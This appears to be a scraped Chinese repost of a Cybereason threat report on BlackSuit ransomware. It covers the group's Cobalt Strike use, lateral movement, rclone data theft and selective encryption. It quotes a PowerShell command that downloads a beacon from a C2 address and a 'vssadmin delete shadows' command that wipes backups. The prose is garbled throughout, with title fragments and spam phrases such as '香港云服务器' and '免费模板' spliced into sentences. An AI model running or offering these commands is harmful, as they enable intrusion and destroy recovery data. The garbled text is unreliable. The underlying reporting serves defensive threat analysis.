BlackSuit:Royal/Conti改头换面重出江湖,新型勒索软件以速度、隐蔽性和数据窃取为特征

  发布时间:2025-12-07 15:23:57   作者:玩站小弟   我要评论
高度协同的破坏性勒索活动Cybereason最新调查揭露,BlackSuit勒索软件组织臭名昭著的Royal和Conti威胁组织的重组后继者)正在实施一场高度协同的破坏性勒索活动。该活动融合了隐蔽性、 。
高度协同的头换特征破坏性勒索活动

Cybereason最新调查揭露  ,BlackSuit勒索软件组织(臭名昭著的面重Royal和Conti威胁组织的重组后继者)正在实施一场高度协同的破坏性勒索活动。该活动融合了隐蔽性 、出江速度和精准打击能力,湖新和数堪称今年最复杂的型勒勒索软件攻击之一 。香港云服务器

Cybereason在报告中指出:"BlackSuit是索软2023年年中出现的勒索软件组织,被广泛认为是速据窃Royal勒索团伙的改头换面或分支 。"

三重杀伤链攻击模式

与传统仅关注加密的度隐勒索攻击不同,BlackSuit采用三阶段杀伤链 :初始入侵 、免费模板蔽性数据窃取和选择性加密,头换特征并辅以数据删除手段破坏恢复工作 。面重

攻击始于部署Cobalt Strike信标实现命令控制(C2)和横向移动  。出江虽然初始入侵途径尚不明确 ,湖新和数但分析人员注意到早期流量来自未安装Cybereason传感器的型勒设备 ,表明系统早已被攻陷 。索软

研究团队强调 :"Cobalt Strike被确认为BlackSuit勒索软件的主要攻击工具。源码下载"

横向移动技术组合

BlackSuit采用多种技术实现横向移动:

通过PsExec.exe在C:\Windows\Temp目录分发执行vm.dll和vm80.dll等载荷创建具有System权限的RPC服务使用Configure-SMRemoting.exe建立远程桌面连接从网络共享执行frdke23.exe等可疑二进制文件,通过rundll32.exe将代码注入wuauclt.exe等合法进程

这些技术使攻击者能在全网进行广泛侦察和载荷部署的同时保持隐蔽性。

载荷投递与执行特征

攻击者使用如下PowerShell命令下载Cobalt Strike信标:

复制invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll1.

同一C2基础设施被用于投递最终载荷——通过重命名为b.exe和vmware.dll等文件部署BlackSuit勒索软件 。一个异常特征是执行时使用了-nomutex标志 :

"与典型勒索行为不同...-nomutex标志禁用互斥体创建...允许并发多实例执行——可能是为了实现冗余 、加速跨会话加密或规避基于互斥体的模板下载检测。"

双重勒索与破坏恢复

加密前,攻击者使用伪装成vmware.exe的rclone.exe窃取约60GB敏感数据。这反映了双重勒索策略的流行趋势——通过预先窃取数据增加赎金压力 。

为破坏系统恢复 ,攻击者使用vssadmin.exe删除卷影副本 :

复制vssadmin delete shadows /all /quiet1.

随后立即执行勒索软件 ,仅针对特定文件类型加密,源码库同时排除Windows 、IPC$和ADMIN$等系统关键文件夹以避免业务中断 。

精心设计的加密逻辑

BlackSuit的加密逻辑针对性能和隐蔽性进行了优化 ,避免加密.exe、.dll和.BlackSuit文件,并投放勒索说明 。

建站模板
  • Tag:

相关文章

  • 数据隐私日:六个方面保护你的数据和隐私

    1月28日是数据隐私日,其设立的目的是提醒人们关注数据隐私,并以自身实际行动来保护个人信息安全。网络犯罪分子和数据挖掘者时刻都在觊觎和窃取人们的信息和数据,因此需要了解保护数据隐私的一些方法。数据隐私
    2025-12-07
  • 规划未来时要了解的数据中心统计数据

    全球有数千个数据中心,其中大约一半位于全球排名前 20 的城市。Gartner 确定了数据和分析(D&A)企业应努力融入其 2022 年战略的三个关键部分。当前的顶级数据
    2025-12-07
  • Win7硬盘重新分区(Win7硬盘重新分区教程,详解步骤及注意事项)

    重新分区硬盘是一项重要的操作,可以帮助我们更好地管理存储空间,提高计算机的性能。本文将详细介绍如何在Win7系统下进行硬盘重新分区,并提供一些注意事项,以确保操作的顺利进行。一、备份重要数据在进行硬盘
    2025-12-07
  • Istio实现熔断和限流的原理

    作者 | 中国移动云能力中心PaaS产品部 房耘耘​应用从单体架构向微服务架构演进的过程中,由于细粒度的微服务应用数量大幅增长,微服务之间的服务发现、负载均衡、熔断限流等服务治理需求显著提高。在微服务
    2025-12-07
  • Web和移动安全之​​​Cookie

    CookieWeb 服务器可以使用 HTTP cookie 将有状态信息与特定客户端相关联[56]。Cookie 信息例如,添加到在线商店购物车的商品的 ID)由客户端存储。Cookie 允许客户端和
    2025-12-07
  • 从零开始学习Windows7操作系统——以U盘启动5.1教程详解(一步一步带你掌握U盘启动Windows7的方法与技巧)

    作为广泛应用的操作系统之一,Windows7在个人电脑领域拥有着广泛的用户群体。然而,对于一些初学者来说,学习Windows7的方式并不那么简单和直观。为了帮助初学者快速入门和深入了解Windows7
    2025-12-07

最新评论